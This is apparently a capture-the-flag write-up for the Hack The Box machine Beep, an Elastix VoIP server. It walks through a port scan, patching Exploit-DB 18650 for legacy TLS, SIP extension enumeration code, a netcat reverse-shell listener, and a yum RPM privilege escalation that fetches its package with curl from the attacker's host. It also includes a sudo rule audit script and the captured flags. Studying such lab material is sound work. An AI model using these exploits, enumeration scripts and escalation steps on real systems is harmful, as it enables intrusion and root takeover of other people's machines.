Service overview
The machine has the IP address 10.10.10.7. Let's look at the nmap output:
$ nmap -sV -sC -Pn -oN 10.10.10.7 10.10.10.7
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: USER IMPLEMENTATION(Cyrus POP3 server v2) TOP EXPIRE(NEVER) LOGIN-DELAY(0) AUTH-RESP-CODE RESP-CODES UIDL APOP PIPELINING STLS
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 875/udp status
|_ 100024 1 878/tcp status
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: UIDPLUS LISTEXT OK URLAUTHA0001 STARTTLS X-NETSCAPE RENAME LIST-SUBSCRIBED ID SORT=MODSEQ CATENATE BINARY SORT ACL Completed NAMESPACE IMAP4rev1 IDLE CONDSTORE THREAD=REFERENCES MULTIAPPEND ANNOTATEMORE QUOTA THREAD=ORDEREDSUBJECT NO MAILBOX-REFERRALS LITERAL+ UNSELECT CHILDREN RIGHTS=kxte IMAP4 ATOMIC
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2017-04-07T08:22:08
| Not valid after: 2018-04-07T08:22:08
| MD5: 621a 82b6 cf7e 1afa 5284 1c91 60c8 fbc8
|_SHA-1: 800a c6e7 065e 1198 0187 c452 0d9b 18ef e557 a09f
|_ssl-date: 2021-05-22T07:04:45+00:00; +2s from scanner time.
878/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: 1s
Web service
We are greeted by Elastix.
Let's look for an exploit. There is one at https://www.exploit-db.com/exploits/18650, but to use it we need a valid extension (user), and we also have to set MinProtocol = None and CipherString = DEFAULT in /etc/ssl/openssl.cnf: the target only offers legacy TLS with a 1024-bit self-signed certificate, which a modern OpenSSL refuses at its default security level.
Let's patch the exploit (it is Python 2, so the urlopen call comes from urllib):
import ssl
import urllib

# Context that neither verifies the self-signed certificate (issued to
# localhost.localdomain) nor checks the hostname against 10.10.10.7.
ctxt = ssl.create_default_context()
ctxt.check_hostname = False
ctxt.verify_mode = ssl.CERT_NONE
url = ...  # the callme_page.php URL that the exploit builds
# urllib.urlopen accepts context= since Python 2.7.9
urllib.urlopen(url, context=ctxt)
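The patch above only disables certificate checking; the openssl.cnf edit is a separate fix for the protocol and cipher policy. As an added example (not part of the original exploit or of this write-up), the following Python 3 code does both per-context, so nothing global has to be changed on the attacking machine. The target URL is a placeholder, and the `legacy_ok` flag exists because some OpenSSL builds refuse legacy settings outright.

```python
import ssl
import urllib.request
import warnings


def legacy_tls_context():
    """Build a client context that tolerates a legacy HTTPS endpoint.

    Two separate relaxations are needed for a host like this one:
      1. certificate verification off (self-signed cert for
         localhost.localdomain, so both chain and hostname checks fail);
      2. protocol/cipher policy lowered, because modern OpenSSL refuses
         TLS 1.0 and, at security level 2, 1024-bit RSA keys.
    Step 2 is the per-context equivalent of MinProtocol = None and
    CipherString = DEFAULT in openssl.cnf.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE

    legacy_ok = True
    try:
        with warnings.catch_warnings():
            # Python >= 3.10 warns that TLSv1 is deprecated; that is the point here.
            warnings.simplefilter("ignore", DeprecationWarning)
            ctx.minimum_version = ssl.TLSVersion.TLSv1
        # SECLEVEL=0 re-enables the weak keys and ciphers that level >= 1 rejects.
        ctx.set_ciphers("DEFAULT:@SECLEVEL=0")
    except (ValueError, ssl.SSLError):
        # This OpenSSL build does not allow legacy settings at all; the
        # exploit would then need a different build or a TLS-terminating proxy.
        legacy_ok = False
    return ctx, legacy_ok


def context_summary(ctx, legacy_ok):
    """Plain-data view of the settings, handy as a pre-flight check."""
    return {
        "check_hostname": ctx.check_hostname,
        "verify_mode": ctx.verify_mode.name,
        "legacy_protocols_enabled": legacy_ok,
    }


def fetch(url, ctx, timeout=10):
    """GET `url` through `ctx`; this is what the patched urlopen call does."""
    with urllib.request.urlopen(url, context=ctx, timeout=timeout) as resp:
        return resp.status, resp.read()


if __name__ == "__main__":
    ctx, legacy_ok = legacy_tls_context()
    print(context_summary(ctx, legacy_ok))
    # Placeholder target; in the write-up this would be the Elastix host.
    # print(fetch("https://10.10.10.7/", ctx))
```

If `legacy_protocols_enabled` comes back False, the handshake will still fail with "unsupported protocol" or "dh key too small" style errors no matter how verification is configured, which is the symptom that the openssl.cnf edit works around.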
SIP scanning
Let's scan SIP extensions 1 through 500:
$ svwar -m INVITE -e1-500 10.10.10.7
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233 | reqauth |
+-----------+----------------+
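To show what svwar is doing under the hood, here is an added example (not svwar's code and not from the write-up) that builds the INVITE probe for one extension and classifies the reply the way svwar's Authentication column does. The attacker and target addresses are taken from the scan above but are assumptions for the probe; the 401 and 404 replies are constructed inline so the classifier can be exercised offline.

```python
import random
import socket
import string

# Assumed addresses for the probe (attacker and target IPs from the write-up).
LHOST = "10.10.16.93"
RHOST = "10.10.10.7"


def _rand(n=10):
    return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(n))


def build_invite(ext, rhost=RHOST, lhost=LHOST, lport=5060):
    """Minimal INVITE for one extension; CRLF line endings are mandatory in SIP."""
    lines = [
        f"INVITE sip:{ext}@{rhost} SIP/2.0",
        f"Via: SIP/2.0/UDP {lhost}:{lport};branch=z9hG4bK{_rand()};rport",
        "Max-Forwards: 70",
        f'From: "{ext}" <sip:{ext}@{rhost}>;tag={_rand()}',
        f"To: <sip:{ext}@{rhost}>",
        f"Call-ID: {_rand()}@{lhost}",
        "CSeq: 1 INVITE",
        f"Contact: <sip:{ext}@{lhost}:{lport}>",
        "Content-Length: 0",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def classify(response):
    """Map a SIP status line to svwar-style verdicts.

    401/407: extension exists and requires auth -> "reqauth"
    200:     extension exists, no auth           -> "noauth"
    404, timeouts, anything else                  -> None (treated as absent)
    Caveat: Asterisk with alwaysauthreject=yes answers 401 for unknown
    extensions too, which makes this enumeration useless; a uniform
    verdict across the whole range is the tell-tale sign.
    """
    status = response.split(b"\r\n", 1)[0]
    parts = status.split(b" ", 2)
    if len(parts) < 2 or not parts[0].startswith(b"SIP/2.0"):
        return None
    code = int(parts[1])
    if code in (401, 407):
        return "reqauth"
    if code == 200:
        return "noauth"
    return None


def scan(extensions, rhost=RHOST, timeout=1.0, transport=None):
    """Probe each extension over UDP/5060 and keep the ones that exist.

    `transport(request) -> response bytes` lets captured or constructed
    answers be replayed offline; by default a real UDP socket is used.
    """
    sock = None
    if transport is None:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(timeout)

        def transport(req):
            sock.sendto(req, (rhost, 5060))
            try:
                return sock.recv(4096)
            except socket.timeout:
                return b""

    found = {}
    for ext in extensions:
        verdict = classify(transport(build_invite(ext, rhost)))
        if verdict:
            found[ext] = verdict
    if sock:
        sock.close()
    return found


# Constructed replies (not captured from the target) to exercise the classifier offline.
FAKE_REPLIES = {
    233: b'SIP/2.0 401 Unauthorized\r\nWWW-Authenticate: Digest realm="asterisk"\r\n\r\n',
}


def fake_transport(request):
    ext = int(request.split(b" ", 2)[1].split(b":")[1].split(b"@")[0])
    return FAKE_REPLIES.get(ext, b"SIP/2.0 404 Not Found\r\n\r\n")


if __name__ == "__main__":
    print(scan(range(230, 236), transport=fake_transport))  # {233: 'reqauth'}
```

Against a live target, `scan(range(1, 501))` reproduces the svwar run above; the INVITE method is used rather than REGISTER or OPTIONS because this Asterisk build answers INVITE for known extensions with 401 and for unknown ones with 404, which is exactly the distinction the table relies on.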
In the exploit, set extension to 233, rhost to 10.10.10.7 and lhost to 10.10.16.93.
Run it, starting the listener first so the callback on port 443 has somewhere to land:
$ rlwrap nc -lnvp 443
$ python2 exp.py
User flag
$ find /home -name '*user.txt*'
/home/fanis/user.txt
$ cat /home/fanis/user.txt
d219362ccd047fb37287db33b240ab24
Privilege escalation
$ sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG
LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
We can run yum as root. We will use the known technique of installing a locally built RPM whose pre-install scriptlet runs as root. The payload is in payload.sh:
#!/bin/bash
# executed as root by yum from the package's %pre scriptlet
chmod u+s /bin/bash
Create the RPM package:
# on the local machine
$ sudo gem install fpm
$ fpm -n root -s dir -t rpm -a all --before-install payload.sh .
Created package {:path=>"root-1.0-1.noarch.rpm"}
$ python3 -m http.server 4443
# on the target
$ curl http://10.10.16.93:4443/test/root-1.0-1.noarch.rpm -o root-1.0-1.noarch.rpm
$ sudo yum localinstall --disablerepo=* --nogpgcheck root-1.0-1.noarch.rpm
# answer "yes" at yum's confirmation prompt
$ ls -la /bin/bash
-rwsr-xr-x 1 root root 729292 Jan 22 2009 /bin/bash
$ /bin/bash -p
$ id
uid=100(asterisk) gid=101(asterisk) euid=0(root)
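The sudo -l list above is long enough that yum is one choice among several: chmod alone, nmap and service each hand over root just as quickly. As an added example (not from the write-up), the following script parses sudo -l output of the form shown and flags the entries that give root code execution, so the decision does not rest on spotting the one familiar binary. The sample text is copied from the output above; the primitive descriptions are my own notes and the entries they do not cover are left for manual review.

```python
import re

# The sudo -l output from the box, embedded verbatim so the audit runs offline.
SUDO_L = """\
User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
"""

# Binaries that yield root code execution or a root-equivalent write when
# allowed without argument restrictions, with the primitive each provides.
KNOWN_PRIMITIVES = {
    "yum": "installs a locally built RPM whose %pre/%post scriptlets run as root",
    "nmap": "NSE scripts (--script) run arbitrary Lua incl. os.execute; old builds also have --interactive",
    "service": "runs the path given as the service name, e.g. service ../../tmp/x",
    "chmod": "sets the setuid bit on any binary directly (chmod u+s /bin/bash)",
    "chown": "takes ownership of root-only files such as /etc/shadow",
    "touch": "creates/updates arbitrary files as root; combines with chmod/chown",
}
DOS_ONLY = {"shutdown", "init"}

# (runas) [TAG: ...]* /path/to/cmd [args]
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$"
)


def parse_sudo_l(text):
    """Yield (runas, nopasswd, command, args) for every rule line."""
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = m.group("tags").upper()
        yield (m.group("runas"), "NOPASSWD" in tags, m.group("cmd"), m.group("args").strip())


def audit_sudo_l(text):
    """Return {command: verdict}. Rules with pinned arguments are much narrower
    and are only marked for manual review."""
    verdicts = {}
    for runas, nopasswd, cmd, args in parse_sudo_l(text):
        name = cmd.rsplit("/", 1)[-1]
        if args:
            verdict = "review: arguments restricted to " + args
        elif name in KNOWN_PRIMITIVES:
            verdict = "root exec: " + KNOWN_PRIMITIVES[name]
        elif name in DOS_ONLY:
            verdict = "denial of service only"
        else:
            verdict = "review manually (no known primitive)"
        if not nopasswd:
            verdict += " [password required]"
        if runas not in ("root", "ALL"):
            verdict += f" [runs as {runas}]"
        verdicts[cmd] = verdict
    return verdicts


def root_exec_commands(text):
    """Just the commands that give root code execution, sorted."""
    return sorted(c for c, v in audit_sudo_l(text).items() if v.startswith("root exec"))


if __name__ == "__main__":
    for cmd, verdict in audit_sudo_l(SUDO_L).items():
        print(f"{cmd:30} {verdict}")
```

The same script run against a hardened sudoers (entries with fixed arguments, or without NOPASSWD) shows how much each restriction buys: an argument-pinned `yum` or `service` rule is a different animal from the unrestricted ones on this box.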
Root flag
cd /root
ls -la
total 16308
drwxr-x--- 2 root root 4096 Jul 16 2019 .
drwxr-xr-x 22 root root 4096 Jul 29 22:51 ..
-rw------- 1 root root 6025 Apr 7 2017 anaconda-ks.cfg
-rw------- 1 root root 1186 Jul 29 21:52 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
-r-xr-xr-x 1 root root 190461 Aug 10 2011 elastix-pr-2.2-1.i386.rpm
-rw-r--r-- 1 root root 18433 Apr 7 2017 install.log
-rw-r--r-- 1 root root 0 Apr 7 2017 install.log.syslog
-rw-r--r-- 1 root root 1 Apr 7 2017 postnochroot
-rw------- 1 root root 33 Jul 29 18:16 root.txt
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
-r-xr-xr-x 1 root root 16358730 Oct 31 2011 webmin-1.570-1.noarch.rpm
cat root.txt
47977ff7e1438d8ceeffb77ccf002bf2